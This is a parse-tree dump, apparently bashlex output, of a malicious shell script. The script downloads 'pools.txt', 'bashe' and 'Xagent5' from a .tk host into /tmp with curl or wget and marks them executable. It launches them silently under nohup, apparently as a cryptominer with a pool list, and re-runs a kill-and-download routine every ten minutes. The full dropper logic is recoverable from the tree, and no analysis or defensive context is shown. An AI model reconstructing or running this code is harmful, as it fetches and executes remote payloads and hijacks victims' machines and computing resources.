                  WordNode(lineno=93, pos=(3745, 3749), word='grep'),
                  WordNode(lineno=93, pos=(3750, 3752), word='-v'),
                  WordNode(lineno=93, pos=(3753, 3757), word='grep'),
                ]),
                PipeNode(lineno=93, pipe='|', pos=(3758, 3759)),
                CommandNode(lineno=93, pos=(3760, 3765), parts=[
                  WordNode(lineno=93, pos=(3760, 3762), word='wc'),
                  WordNode(lineno=93, pos=(3763, 3765), word='-l'),
                ]),
              ]), lineno=93, pos=(3721, 3766)),
          ]),
        ]),
        OperatorNode(lineno=127, op='\n', pos=(3766, 3767)),
        CompoundNode(lineno=157, list=[
          IfNode(lineno=157, pos=(3768, 4666), parts=[
            ReservedwordNode(lineno=127, pos=(3768, 3770), word='if'),
            ListNode(lineno=127, pos=(3771, 3786), parts=[
                CommandNode(lineno=127, pos=(3771, 3785), parts=[
                  WordNode(lineno=127, pos=(3771, 3772), word='['),
                  WordNode(lineno=127, pos=(3773, 3777), word='${p}', parts=[
                    ParameterNode(lineno=127, pos=(3773, 3777), value='p'),
                  ]),
                  WordNode(lineno=127, pos=(3778, 3781), word='-eq'),
                  WordNode(lineno=127, pos=(3782, 3783), word='1'),
                  WordNode(lineno=127, pos=(3784, 3785), word=']'),
                ]),
                OperatorNode(lineno=127, op=';', pos=(3785, 3786)),
              ]),
            ReservedwordNode(lineno=127, pos=(3786, 3790), word='then'),
            CommandNode(lineno=128, pos=(3793, 3805), parts=[
              WordNode(lineno=128, pos=(3793, 3797), word='echo'),
              WordNode(lineno=128, pos=(3798, 3805), word='bashd'),
            ]),
            ReservedwordNode(lineno=129, pos=(3807, 3811), word='elif'),
            ListNode(lineno=129, pos=(3812, 3827), parts=[
                CommandNode(lineno=129, pos=(3812, 3826), parts=[
                  WordNode(lineno=129, pos=(3812, 3813), word='['),
                  WordNode(lineno=129, pos=(3814, 3818), word='${p}', parts=[
                    ParameterNode(lineno=129, pos=(3814, 3818), value='p'),
                  ]),
                  WordNode(lineno=129, pos=(3819, 3822), word='-eq'),
                  WordNode(lineno=129, pos=(3823, 3824), word='0'),
                  WordNode(lineno=129, pos=(3825, 3826), word=']'),
                ]),
                OperatorNode(lineno=129, op=';', pos=(3826, 3827)),
              ]),
            ReservedwordNode(lineno=129, pos=(3827, 3831), word='then'),
            ListNode(lineno=155, pos=(3834, 4647), parts=[
                CompoundNode(lineno=136, list=[
                  IfNode(lineno=136, pos=(3834, 4116), parts=[
                    ReservedwordNode(lineno=130, pos=(3834, 3836), word='if'),
                    ListNode(lineno=130, pos=(3837, 3863), parts=[
                        CommandNode(lineno=130, pos=(3837, 3862), parts=[
                          WordNode(lineno=130, pos=(3837, 3838), word='['),
                          WordNode(lineno=130, pos=(3839, 3840), word='!'),
                          WordNode(lineno=130, pos=(3841, 3843), word='-f'),
                          WordNode(lineno=130, pos=(3844, 3860), word='/tmp/pools.txt'),
                          WordNode(lineno=130, pos=(3861, 3862), word=']'),
                        ]),
                        OperatorNode(lineno=130, op=';', pos=(3862, 3863)),
                      ]),
                    ReservedwordNode(lineno=130, pos=(3864, 3868), word='then'),
                    ListNode(lineno=136, pos=(3873, 4112), parts=[
                        CommandNode(lineno=131, pos=(3873, 3932), parts=[
                          WordNode(lineno=131, pos=(3873, 3877), word='curl'),
                          WordNode(lineno=131, pos=(3878, 3914), word='http://e3sas6tzvehwgpak.tk/pools.txt'),
                          WordNode(lineno=131, pos=(3915, 3917), word='-o'),
                          WordNode(lineno=131, pos=(3918, 3932), word='/tmp/pools.txt'),
                        ]),
                        OperatorNode(lineno=131, op='&&', pos=(3933, 3935)),
                        CommandNode(lineno=131, pos=(3936, 3959), parts=[
                          WordNode(lineno=131, pos=(3936, 3941), word='chmod'),
                          WordNode(lineno=131, pos=(3942, 3944), word='+x'),
                          WordNode(lineno=131, pos=(3945, 3959), word='/tmp/pools.txt'),
                        ]),
                        OperatorNode(lineno=132, op='\n', pos=(3959, 3960)),
                        CompoundNode(lineno=135, list=[
                          IfNode(lineno=135, pos=(3964, 4111), parts=[
                            ReservedwordNode(lineno=132, pos=(3964, 3966), word='if'),
                            ListNode(lineno=132, pos=(3967, 3993), parts=[
                                CommandNode(lineno=132, pos=(3967, 3992), parts=[
                                  WordNode(lineno=132, pos=(3967, 3968), word='['),
                                  WordNode(lineno=132, pos=(3969, 3970), word='!'),
                                  WordNode(lineno=132, pos=(3971, 3973), word='-f'),
                                  WordNode(lineno=132, pos=(3974, 3990), word='/tmp/pools.txt'),
                                  WordNode(lineno=132, pos=(3991, 3992), word=']'),
                                ]),
                                OperatorNode(lineno=132, op=';', pos=(3992, 3993)),
                              ]),
                            ReservedwordNode(lineno=132, pos=(3994, 3998), word='then'),
                            ListNode(lineno=135, pos=(4004, 4105), parts=[
                                CommandNode(lineno=133, pos=(4004, 4053), parts=[
                                  WordNode(lineno=133, pos=(4004, 4008), word='wget'),
                                  WordNode(lineno=133, pos=(4009, 4045), word='http://e3sas6tzvehwgpak.tk/pools.txt'),
                                  WordNode(lineno=133, pos=(4046, 4048), word='-P'),
                                  WordNode(lineno=133, pos=(4049, 4053), word='/tmp'),
                                ]),
                                OperatorNode(lineno=133, op='&&', pos=(4054, 4056)),
                                CommandNode(lineno=133, pos=(4057, 4080), parts=[
                                  WordNode(lineno=133, pos=(4057, 4062), word='chmod'),
                                  WordNode(lineno=133, pos=(4063, 4065), word='+x'),
                                  WordNode(lineno=133, pos=(4066, 4080), word='/tmp/pools.txt'),
                                ]),
                                OperatorNode(lineno=134, op='\n', pos=(4080, 4081)),
                                CommandNode(lineno=134, pos=(4086, 4104), parts=[
                                  WordNode(lineno=134, pos=(4086, 4088), word='rm'),
                                  WordNode(lineno=134, pos=(4089, 4092), word='-rf'),
                                  WordNode(lineno=134, pos=(4093, 4104), word='pools.txt.*'),
                                ]),
                                OperatorNode(lineno=135, op='\n', pos=(4104, 4105)),
                              ]),
                            ReservedwordNode(lineno=135, pos=(4109, 4111), word='fi'),
                          ]),
                        ], pos=(3964, 4111)),
                        OperatorNode(lineno=136, op='\n', pos=(4111, 4112)),
                      ]),
                    ReservedwordNode(lineno=136, pos=(4114, 4116), word='fi'),
                  ]),
                ], pos=(3834, 4116)),
                OperatorNode(lineno=137, op='\n', pos=(4116, 4117)),
                CompoundNode(lineno=154, list=[
                  IfNode(lineno=154, pos=(4120, 4646), parts=[
                    ReservedwordNode(lineno=138, pos=(4120, 4122), word='if'),
                    ListNode(lineno=138, pos=(4123, 4145), parts=[
                        CommandNode(lineno=138, pos=(4123, 4144), parts=[
                          WordNode(lineno=138, pos=(4123, 4124), word='['),
                          WordNode(lineno=138, pos=(4125, 4126), word='!'),
                          WordNode(lineno=138, pos=(4127, 4129), word='-f'),
                          WordNode(lineno=138, pos=(4130, 4142), word='/tmp/bashe'),
                          WordNode(lineno=138, pos=(4143, 4144), word=']'),
                        ]),
                        OperatorNode(lineno=138, op=';', pos=(4144, 4145)),
                      ]),
                    ReservedwordNode(lineno=138, pos=(4146, 4150), word='then'),
                    ListNode(lineno=144, pos=(4155, 4422), parts=[
                        CommandNode(lineno=139, pos=(4155, 4206), parts=[
                          WordNode(lineno=139, pos=(4155, 4159), word='curl'),
                          WordNode(lineno=139, pos=(4160, 4192), word='http://e3sas6tzvehwgpak.tk/bashe'),
                          WordNode(lineno=139, pos=(4193, 4195), word='-o'),
                          WordNode(lineno=139, pos=(4196, 4206), word='/tmp/bashe'),
                        ]),
                        OperatorNode(lineno=139, op='&&', pos=(4207, 4209)),
                        CommandNode(lineno=139, pos=(4210, 4229), parts=[
                          WordNode(lineno=139, pos=(4210, 4215), word='chmod'),
                          WordNode(lineno=139, pos=(4216, 4218), word='+x'),
                          WordNode(lineno=139, pos=(4219, 4229), word='/tmp/bashe'),
                        ]),
                        OperatorNode(lineno=140, op='\n', pos=(4229, 4230)),
                        CompoundNode(lineno=143, list=[
                          IfNode(lineno=143, pos=(4234, 4365), parts=[
                            ReservedwordNode(lineno=140, pos=(4234, 4236), word='if'),
                            ListNode(lineno=140, pos=(4237, 4259), parts=[
                                CommandNode(lineno=140, pos=(4237, 4258), parts=[
                                  WordNode(lineno=140, pos=(4237, 4238), word='['),
                                  WordNode(lineno=140, pos=(4239, 4240), word='!'),
                                  WordNode(lineno=140, pos=(4241, 4243), word='-f'),
                                  WordNode(lineno=140, pos=(4244, 4256), word='/tmp/bashe'),
                                  WordNode(lineno=140, pos=(4257, 4258), word=']'),
                                ]),
                                OperatorNode(lineno=140, op=';', pos=(4258, 4259)),
                              ]),
                            ReservedwordNode(lineno=140, pos=(4260, 4264), word='then'),
                            ListNode(lineno=143, pos=(4270, 4359), parts=[
                                CommandNode(lineno=141, pos=(4270, 4315), parts=[
                                  WordNode(lineno=141, pos=(4270, 4274), word='wget'),
                                  WordNode(lineno=141, pos=(4275, 4307), word='http://e3sas6tzvehwgpak.tk/bashe'),
                                  WordNode(lineno=141, pos=(4308, 4310), word='-P'),
                                  WordNode(lineno=141, pos=(4311, 4315), word='/tmp'),
                                ]),
                                OperatorNode(lineno=141, op='&&', pos=(4316, 4318)),
                                CommandNode(lineno=141, pos=(4319, 4338), parts=[
                                  WordNode(lineno=141, pos=(4319, 4324), word='chmod'),
                                  WordNode(lineno=141, pos=(4325, 4327), word='+x'),
                                  WordNode(lineno=141, pos=(4328, 4338), word='/tmp/bashe'),
                                ]),
                                OperatorNode(lineno=142, op='\n', pos=(4338, 4339)),
                                CommandNode(lineno=142, pos=(4344, 4358), parts=[
                                  WordNode(lineno=142, pos=(4344, 4346), word='rm'),
                                  WordNode(lineno=142, pos=(4347, 4350), word='-rf'),
                                  WordNode(lineno=142, pos=(4351, 4358), word='bashe.*'),
                                ]),
                                OperatorNode(lineno=143, op='\n', pos=(4358, 4359)),
                              ]),
                            ReservedwordNode(lineno=143, pos=(4363, 4365), word='fi'),
                          ]),
                        ], pos=(4234, 4365)),
                        OperatorNode(lineno=144, op='\n', pos=(4365, 4366)),
                        CommandNode(lineno=144, pos=(4370, 4420), parts=[
                          WordNode(lineno=144, pos=(4370, 4375), word='nohup'),
                          WordNode(lineno=144, pos=(4376, 4386), word='/tmp/bashe'),
                          WordNode(lineno=144, pos=(4388, 4390), word='-C'),
                          WordNode(lineno=144, pos=(4391, 4405), word='/tmp/pools.txt'),
                          RedirectNode(lineno=144, output=
                            WordNode(lineno=144, pos=(4406, 4415), word='/dev/null'), pos=(4405, 4415), type='>'),
                          RedirectNode(input=2, lineno=144, output=1, pos=(4416, 4420), type='>&'),
                        ]),
                        OperatorNode(lineno=144, op='&', pos=(4421, 4422)),
                      ]),
                    ReservedwordNode(lineno=145, pos=(4425, 4429), word='else'),
                    ListNode(lineno=154, pos=(4434, 4642), parts=[
                        CommandNode(lineno=146, pos=(4434, 4481), parts=[
                          AssignmentNode(lineno=146, pos=(4434, 4481), word='p=$(ps aux | grep bashe | grep -v grep | wc -l)', parts=[
                            CommandsubstitutionNode(command=
                              PipelineNode(lineno=93, pos=(4438, 4480), parts=[
                                CommandNode(lineno=93, pos=(4438, 4444), parts=[
                                  WordNode(lineno=93, pos=(4438, 4440), word='ps'),
                                  WordNode(lineno=93, pos=(4441, 4444), word='aux'),
                                ]),
                                PipeNode(lineno=93, pipe='|', pos=(4445, 4446)),
                                CommandNode(lineno=93, pos=(4447, 4457), parts=[
                                  WordNode(lineno=93, pos=(4447, 4451), word='grep'),
                                  WordNode(lineno=93, pos=(4452, 4457), word='bashe'),
                                ]),
                                PipeNode(lineno=93, pipe='|', pos=(4458, 4459)),
                                CommandNode(lineno=93, pos=(4460, 4472), parts=[
                                  WordNode(lineno=93, pos=(4460, 4464), word='grep'),
                                  WordNode(lineno=93, pos=(4465, 4467), word='-v'),
                                  WordNode(lineno=93, pos=(4468, 4472), word='grep'),
                                ]),
                                PipeNode(lineno=93, pipe='|', pos=(4473, 4474)),
                                CommandNode(lineno=93, pos=(4475, 4480), parts=[
                                  WordNode(lineno=93, pos=(4475, 4477), word='wc'),
                                  WordNode(lineno=93, pos=(4478, 4480), word='-l'),
                                ]),
                              ]), lineno=93, pos=(4436, 4481)),
                          ]),
                        ]),
                        OperatorNode(lineno=147, op='\n', pos=(4481, 4482)),
                        CompoundNode(lineno=153, list=[
                          IfNode(lineno=153, pos=(4486, 4641), parts=[
                            ReservedwordNode(lineno=147, pos=(4486, 4488), word='if'),
                            ListNode(lineno=147, pos=(4489, 4504), parts=[
                                CommandNode(lineno=147, pos=(4489, 4503), parts=[
                                  WordNode(lineno=147, pos=(4489, 4490), word='['),
                                  WordNode(lineno=147, pos=(4491, 4495), word='${p}', parts=[
                                    ParameterNode(lineno=147, pos=(4491, 4495), value='p'),
                                  ]),
                                  WordNode(lineno=147, pos=(4496, 4499), word='-eq'),
                                  WordNode(lineno=147, pos=(4500, 4501), word='1'),
                                  WordNode(lineno=147, pos=(4502, 4503), word=']'),
                                ]),
                                OperatorNode(lineno=147, op=';', pos=(4503, 4504)),
                              ]),
                            ReservedwordNode(lineno=147, pos=(4504, 4508), word='then'),
                            CommandNode(lineno=148, pos=(4514, 4526), parts=[
                              WordNode(lineno=148, pos=(4514, 4518), word='echo'),
                              WordNode(lineno=148, pos=(4519, 4526), word='bashe'),
                            ]),
                            ReservedwordNode(lineno=149, pos=(4531, 4535), word='elif'),
                            ListNode(lineno=149, pos=(4536, 4551), parts=[
                                CommandNode(lineno=149, pos=(4536, 4550), parts=[
                                  WordNode(lineno=149, pos=(4536, 4537), word='['),
                                  WordNode(lineno=149, pos=(4538, 4542), word='${p}', parts=[
                                    ParameterNode(lineno=149, pos=(4538, 4542), value='p'),
                                  ]),
                                  WordNode(lineno=149, pos=(4543, 4546), word='-eq'),
                                  WordNode(lineno=149, pos=(4547, 4548), word='0'),
                                  WordNode(lineno=149, pos=(4549, 4550), word=']'),
                                ]),
                                OperatorNode(lineno=149, op=';', pos=(4550, 4551)),
                              ]),
                            ReservedwordNode(lineno=149, pos=(4551, 4555), word='then'),
                            ListNode(lineno=150, pos=(4561, 4612), parts=[
                                CommandNode(lineno=150, pos=(4561, 4610), parts=[
                                  WordNode(lineno=150, pos=(4561, 4566), word='nohup'),
                                  WordNode(lineno=150, pos=(4567, 4577), word='/tmp/bashe'),
                                  WordNode(lineno=150, pos=(4578, 4580), word='-C'),
                                  WordNode(lineno=150, pos=(4581, 4595), word='/tmp/pools.txt'),
                                  RedirectNode(lineno=150, output=
                                    WordNode(lineno=150, pos=(4596, 4605), word='/dev/null'), pos=(4595, 4605), type='>'),
                                  RedirectNode(input=2, lineno=150, output=1, pos=(4606, 4610), type='>&'),
                                ]),
                                OperatorNode(lineno=150, op='&', pos=(4611, 4612)),
                              ]),
                            ReservedwordNode(lineno=151, pos=(4617, 4621), word='else'),
                            CommandNode(lineno=152, pos=(4627, 4634), parts=[
                              WordNode(lineno=152, pos=(4627, 4631), word='echo'),
                              WordNode(lineno=152, pos=(4632, 4634)),
                            ]),
                            ReservedwordNode(lineno=153, pos=(4639, 4641), word='fi'),
                          ]),
                        ], pos=(4486, 4641)),
                        OperatorNode(lineno=154, op='\n', pos=(4641, 4642)),
                      ]),
                    ReservedwordNode(lineno=154, pos=(4644, 4646), word='fi'),
                  ]),
                ], pos=(4120, 4646)),
                OperatorNode(lineno=155, op='\n', pos=(4646, 4647)),
              ]),
            ReservedwordNode(lineno=155, pos=(4648, 4652), word='else'),
            CommandNode(lineno=156, pos=(4655, 4662), parts=[
              WordNode(lineno=156, pos=(4655, 4659), word='echo'),
              WordNode(lineno=156, pos=(4660, 4662)),
            ]),
            ReservedwordNode(lineno=157, pos=(4664, 4666), word='fi'),
          ]),
        ], pos=(3768, 4666)),
        OperatorNode(lineno=158, op='\n', pos=(4666, 4667)),
        CommandNode(lineno=158, pos=(4668, 4676), parts=[
          WordNode(lineno=158, pos=(4668, 4673), word='sleep'),
          WordNode(lineno=158, pos=(4674, 4676), word='15'),
        ]),
        OperatorNode(lineno=159, op='\n', pos=(4676, 4677)),
        CompoundNode(lineno=175, list=[
          IfNode(lineno=175, pos=(4678, 5177), parts=[
            ReservedwordNode(lineno=159, pos=(4678, 4680), word='if'),
            ListNode(lineno=159, pos=(4681, 4705), parts=[
                CommandNode(lineno=159, pos=(4681, 4704), parts=[
                  WordNode(lineno=159, pos=(4681, 4682), word='['),
                  WordNode(lineno=159, pos=(4683, 4684), word='!'),
                  WordNode(lineno=159, pos=(4685, 4687), word='-f'),
                  WordNode(lineno=159, pos=(4688, 4702), word='/tmp/Xagent5'),
                  WordNode(lineno=159, pos=(4703, 4704), word=']'),
                ]),
                OperatorNode(lineno=159, op=';', pos=(4704, 4705)),
              ]),
            ReservedwordNode(lineno=159, pos=(4706, 4710), word='then'),
            ListNode(lineno=165, pos=(4714, 4974), parts=[
                CommandNode(lineno=160, pos=(4714, 4769), parts=[
                  WordNode(lineno=160, pos=(4714, 4718), word='curl'),
                  WordNode(lineno=160, pos=(4719, 4753), word='http://e3sas6tzvehwgpak.tk/Xagent5'),
                  WordNode(lineno=160, pos=(4754, 4756), word='-o'),
                  WordNode(lineno=160, pos=(4757, 4769), word='/tmp/Xagent5'),
                ]),
                OperatorNode(lineno=160, op='&&', pos=(4770, 4772)),
                CommandNode(lineno=160, pos=(4773, 4794), parts=[
                  WordNode(lineno=160, pos=(4773, 4778), word='chmod'),
                  WordNode(lineno=160, pos=(4779, 4781), word='+x'),
                  WordNode(lineno=160, pos=(4782, 4794), word='/tmp/Xagent5'),
                ]),
                OperatorNode(lineno=161, op='\n', pos=(4794, 4795)),
                CompoundNode(lineno=164, list=[
                  IfNode(lineno=164, pos=(4798, 4934), parts=[
                    ReservedwordNode(lineno=161, pos=(4798, 4800), word='if'),
                    ListNode(lineno=161, pos=(4801, 4825), parts=[
                        CommandNode(lineno=161, pos=(4801, 4824), parts=[
                          WordNode(lineno=161, pos=(4801, 4802), word='['),
                          WordNode(lineno=161, pos=(4803, 4804), word='!'),
                          WordNode(lineno=161, pos=(4805, 4807), word='-f'),
                          WordNode(lineno=161, pos=(4808, 4822), word='/tmp/Xagent5'),
                          WordNode(lineno=161, pos=(4823, 4824), word=']'),
                        ]),
                        OperatorNode(lineno=161, op=';', pos=(4824, 4825)),
                      ]),
                    ReservedwordNode(lineno=161, pos=(4826, 4830), word='then'),
                    ListNode(lineno=164, pos=(4835, 4929), parts=[
                        CommandNode(lineno=162, pos=(4835, 4882), parts=[
                          WordNode(lineno=162, pos=(4835, 4839), word='wget'),
                          WordNode(lineno=162, pos=(4840, 4874), word='http://e3sas6tzvehwgpak.tk/Xagent5'),
                          WordNode(lineno=162, pos=(4875, 4877), word='-P'),
                          WordNode(lineno=162, pos=(4878, 4882), word='/tmp'),
                        ]),
                        OperatorNode(lineno=162, op='&&', pos=(4883, 4885)),
                        CommandNode(lineno=162, pos=(4886, 4907), parts=[
                          WordNode(lineno=162, pos=(4886, 4891), word='chmod'),
                          WordNode(lineno=162, pos=(4892, 4894), word='+x'),
                          WordNode(lineno=162, pos=(4895, 4907), word='/tmp/Xagent5'),
                        ]),
                        OperatorNode(lineno=163, op='\n', pos=(4907, 4908)),
                        CommandNode(lineno=163, pos=(4912, 4928), parts=[
                          WordNode(lineno=163, pos=(4912, 4914), word='rm'),
                          WordNode(lineno=163, pos=(4915, 4918), word='-rf'),
                          WordNode(lineno=163, pos=(4919, 4928), word='Xagent5.*'),
                        ]),
                        OperatorNode(lineno=164, op='\n', pos=(4928, 4929)),
                      ]),
                    ReservedwordNode(lineno=164, pos=(4932, 4934), word='fi'),
                  ]),
                ], pos=(4798, 4934)),
                OperatorNode(lineno=165, op='\n', pos=(4934, 4935)),
                CommandNode(lineno=165, pos=(4938, 4972), parts=[
                  WordNode(lineno=165, pos=(4938, 4943), word='nohup'),
                  WordNode(lineno=165, pos=(4944, 4956), word='/tmp/Xagent5'),
                  RedirectNode(lineno=165, output=
                    WordNode(lineno=165, pos=(4958, 4967), word='/dev/null'), pos=(4957, 4967), type='>'),
                  RedirectNode(input=2, lineno=165, output=1, pos=(4968, 4972), type='>&'),
                ]),
                OperatorNode(lineno=165, op='&', pos=(4973, 4974)),
              ]),
            ReservedwordNode(lineno=166, pos=(4976, 4980), word='else'),
            ListNode(lineno=175, pos=(4984, 5174), parts=[
                CommandNode(lineno=167, pos=(4984, 5033), parts=[
                  AssignmentNode(lineno=167, pos=(4984, 5033), word='p=$(ps aux | grep Xagent5 | grep -v grep | wc -l)', parts=[
                    CommandsubstitutionNode(command=
                      PipelineNode(lineno=93, pos=(4988, 5032), parts=[
                        CommandNode(lineno=93, pos=(4988, 4994), parts=[
                          WordNode(lineno=93, pos=(4988, 4990), word='ps'),
                          WordNode(lineno=93, pos=(4991, 4994), word='aux'),
                        ]),
                        PipeNode(lineno=93, pipe='|', pos=(4995, 4996)),
                        CommandNode(lineno=93, pos=(4997, 5009), parts=[
                          WordNode(lineno=93, pos=(4997, 5001), word='grep'),
                          WordNode(lineno=93, pos=(5002, 5009), word='Xagent5'),
                        ]),
                        PipeNode(lineno=93, pipe='|', pos=(5010, 5011)),
                        CommandNode(lineno=93, pos=(5012, 5024), parts=[
                          WordNode(lineno=93, pos=(5012, 5016), word='grep'),
                          WordNode(lineno=93, pos=(5017, 5019), word='-v'),
                          WordNode(lineno=93, pos=(5020, 5024), word='grep'),
                        ]),
                        PipeNode(lineno=93, pipe='|', pos=(5025, 5026)),
                        CommandNode(lineno=93, pos=(5027, 5032), parts=[
                          WordNode(lineno=93, pos=(5027, 5029), word='wc'),
                          WordNode(lineno=93, pos=(5030, 5032), word='-l'),
                        ]),
                      ]), lineno=93, pos=(4986, 5033)),
                  ]),
                ]),
                OperatorNode(lineno=168, op='\n', pos=(5033, 5034)),
                CompoundNode(lineno=174, list=[
                  IfNode(lineno=174, pos=(5037, 5173), parts=[
                    ReservedwordNode(lineno=168, pos=(5037, 5039), word='if'),
                    ListNode(lineno=168, pos=(5040, 5055), parts=[
                        CommandNode(lineno=168, pos=(5040, 5054), parts=[
                          WordNode(lineno=168, pos=(5040, 5041), word='['),
                          WordNode(lineno=168, pos=(5042, 5046), word='${p}', parts=[
                            ParameterNode(lineno=168, pos=(5042, 5046), value='p'),
                          ]),
                          WordNode(lineno=168, pos=(5047, 5050), word='-eq'),
                          WordNode(lineno=168, pos=(5051, 5052), word='1'),
                          WordNode(lineno=168, pos=(5053, 5054), word=']'),
                        ]),
                        OperatorNode(lineno=168, op=';', pos=(5054, 5055)),
                      ]),
                    ReservedwordNode(lineno=168, pos=(5055, 5059), word='then'),
                    CommandNode(lineno=169, pos=(5064, 5078), parts=[
                      WordNode(lineno=169, pos=(5064, 5068), word='echo'),
                      WordNode(lineno=169, pos=(5069, 5078), word='Xagent5'),
                    ]),
                    ReservedwordNode(lineno=170, pos=(5082, 5086), word='elif'),
                    ListNode(lineno=170, pos=(5087, 5102), parts=[
                        CommandNode(lineno=170, pos=(5087, 5101), parts=[
                          WordNode(lineno=170, pos=(5087, 5088), word='['),
                          WordNode(lineno=170, pos=(5089, 5093), word='${p}', parts=[
                            ParameterNode(lineno=170, pos=(5089, 5093), value='p'),
                          ]),
                          WordNode(lineno=170, pos=(5094, 5097), word='-eq'),
                          WordNode(lineno=170, pos=(5098, 5099), word='0'),
                          WordNode(lineno=170, pos=(5100, 5101), word=']'),
                        ]),
                        OperatorNode(lineno=170, op=';', pos=(5101, 5102)),
                      ]),
                    ReservedwordNode(lineno=170, pos=(5102, 5106), word='then'),
                    ListNode(lineno=171, pos=(5111, 5147), parts=[
                        CommandNode(lineno=171, pos=(5111, 5145), parts=[
                          WordNode(lineno=171, pos=(5111, 5116), word='nohup'),
                          WordNode(lineno=171, pos=(5117, 5129), word='/tmp/Xagent5'),
                          RedirectNode(lineno=171, output=
                            WordNode(lineno=171, pos=(5131, 5140), word='/dev/null'), pos=(5130, 5140), type='>'),
                          RedirectNode(input=2, lineno=171, output=1, pos=(5141, 5145), type='>&'),
                        ]),
                        OperatorNode(lineno=171, op='&', pos=(5146, 5147)),
                      ]),
                    ReservedwordNode(lineno=172, pos=(5151, 5155), word='else'),
                    CommandNode(lineno=173, pos=(5160, 5167), parts=[
                      WordNode(lineno=173, pos=(5160, 5164), word='echo'),
                      WordNode(lineno=173, pos=(5165, 5167)),
                    ]),
                    ReservedwordNode(lineno=174, pos=(5171, 5173), word='fi'),
                  ]),
                ], pos=(5037, 5173)),
                OperatorNode(lineno=175, op='\n', pos=(5173, 5174)),
              ]),
            ReservedwordNode(lineno=175, pos=(5175, 5177), word='fi'),
          ]),
        ], pos=(4678, 5177)),
        OperatorNode(lineno=176, op='\n', pos=(5177, 5178)),
      ]),
    ReservedwordNode(lineno=176, pos=(5178, 5179), word='}'),
  ], pos=(2778, 5179)),
])
CompoundNode(lineno=183, list=[
  WhileNode(lineno=183, pos=(5181, 5231), parts=[
    ReservedwordNode(lineno=178, pos=(5181, 5186), word='while'),
    CommandNode(lineno=178, pos=(5187, 5192), parts=[
      WordNode(lineno=178, pos=(5187, 5188), word='['),
      WordNode(lineno=178, pos=(5189, 5190), word='1'),
      WordNode(lineno=178, pos=(5191, 5192), word=']'),
    ]),
    ReservedwordNode(lineno=179, pos=(5193, 5195), word='do'),
    ListNode(lineno=183, pos=(5197, 5227), parts=[
        CommandNode(lineno=180, pos=(5197, 5202), parts=[
          WordNode(lineno=180, pos=(5197, 5202), word='kills'),
        ]),
        OperatorNode(lineno=181, op='\n', pos=(5202, 5203)),
        CommandNode(lineno=181, pos=(5204, 5215), parts=[
          WordNode(lineno=181, pos=(5204, 5215), word='downloadyam'),
        ]),
        OperatorNode(lineno=182, op='\n', pos=(5215, 5216)),
        CommandNode(lineno=182, pos=(5217, 5226), parts=[
          WordNode(lineno=182, pos=(5217, 5222), word='sleep'),
          WordNode(lineno=182, pos=(5223, 5226), word='600'),
        ]),
        OperatorNode(lineno=183, op='\n', pos=(5226, 5227)),
      ]),
    ReservedwordNode(lineno=183, pos=(5227, 5231), word='done'),
  ]),
], pos=(5181, 5231))
